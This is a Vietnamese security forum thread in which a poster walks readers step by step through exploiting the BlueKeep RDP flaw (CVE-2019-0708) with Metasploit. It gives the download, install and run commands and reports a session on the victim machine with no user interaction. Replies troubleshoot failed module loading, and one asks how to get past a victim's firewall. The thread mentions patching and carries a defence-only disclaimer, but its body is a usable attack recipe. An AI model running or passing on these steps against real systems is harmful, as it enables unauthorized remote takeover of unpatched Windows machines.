Khai thác lỗ hổng thực thi mã từ xa trong Remote Desktop Protocol với Metasploit

DDos

VIP Members
22/10/2013
524
2.191 bài viết
Khai thác lỗ hổng thực thi mã từ xa trong Remote Desktop Protocol với Metasploit
Trong bản vá tháng 5 vừa qua, Microsoft đã vá một lỗ hổng thực thi mã từ xa rất nguy hiểm liên quan đến giao thức Remote Desktop Protocol (RDP). Điều nguy hiểm nhất của lỗ hổng này nằm ở việc không yêu cầu xác thực cũng như tương tác của người dùng. Lỗ hổng này ảnh hưởng tới Windows 2003, XP, Windows 7, Windows Server 2008 và 2008 R2 và có thể tự động lây lan trên các hệ thống không được bảo vệ. Mặc dù, Windows XP đã ngưng hỗ trợ, nhưng do mức độ ảnh hưởng quá lớn tới hệ thống, Microsoft đã phải tung ra bản vá khẩn cấp cho phiên bản Windows cũ kỹ này.

Gần đây, dưới sự hợp tác của nhiều nhà nghiên cứu bảo mật, họ đã công bố module khai thác cho phép thực thi mã từ xa thông qua lỗ hổng BlueKeep. Module này được tích hợp sẵn vào nền tảng thử nghiệm thâm nhập nổi tiếng Metasploit. Module này cho phép khai thác dễ dàng lỗ hổng BlueKeep.

Trong bài viết này mình sẽ hướng dẫn các bạn cách khai thác lỗ hổng BlueKeep sử dụng Metasploit.

Yêu cầu:
  • Kali Linux
  • Windows 7/ Server 2008R2
Bước 1: Hãy chắc chắn rằng bạn đang sử dụng Metasploit phiên bản mới nhất. Bởi theo mình biết thì module khai thác lỗ hổng BlueKeep này yêu cầu Metasploit 5 trở lên. Trong Kali Linux sử dụng lệnh dưới để cập nhật Metasploit:
Mã:
apt install Metasploit-framework
Bước 2: Do các module chưa được chính thức tích hợp vào Metasploit nên bạn cần tải về các module cần thiết phục vụ cho việc khai thác lỗ khổng. Sử dụng các lệnh dưới đây để tải các module này:
Mã:
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
Bước 3: Di chuyển các module vừa tải về ở trên tới Metasploit với các lệnh dưới:
Mã:
mv rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
mv rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
mv cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mv cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
Bước 4: Chạy Metasploit với lệnh msfconsole và tải lại toàn bộ module của Metasploit:
Mã:
reload_all
Bước 5: sử dụng module cve_2019_0708_bluekeep_rce và thiết lập các tham số RHOSTS/TARGET/PAYLOAD cần thiết
target.PNG

Bước 6: Chạy lệnh exploit để tiến hành khai thác mục tiêu.
session.PNG

Chúng ta đã có một kết nối từ máy tính nạn nhân mà không cần bất kì một tương tác nào từ phía họ.

Lưu ý: Microsoft đã chính thức tung ra bản vá cho lỗ hổng này. Các bạn nên cập nhật hệ thống Windows của mình để đảm bảo hệ thống được an toàn trước sự nguy hiểm của lỗ hổng này.
 
em làm đến bước 5 nó báo là không dùng được module, search module nó cũng không hiện bác ạ
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
đây bác
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bạn này hình như làm thiếu bước cuối này rồi

mv cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bạn này hình như làm thiếu bước cuối này rồi

mv cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/
em dùng lệnh này ko được, nên em tạo thư mục rdp trong windows rồi copy bluekeep vào rồi mà
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Cập nhật metasploit đi bạn.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
File source.list của bạn là thế nào nhỉ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: sunny and DDos
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
bản 2019-3 có sẵn rồi mà
Mình không biết bản của bạn có sẵn chưa nhưng với bản của mình chỉ có scan thôi và mình phải làm vậy mới có mudule exploit.
Như trong ảnh bạn chụp thì msf của bạn có load được module đó đâu nên đương nhiên khi sử dụng nó, nó báo lỗi là chuyện đương nhiên rồi.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
cho mình hỏi máy victim bật firewall thì có cách nào k ạ ?
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên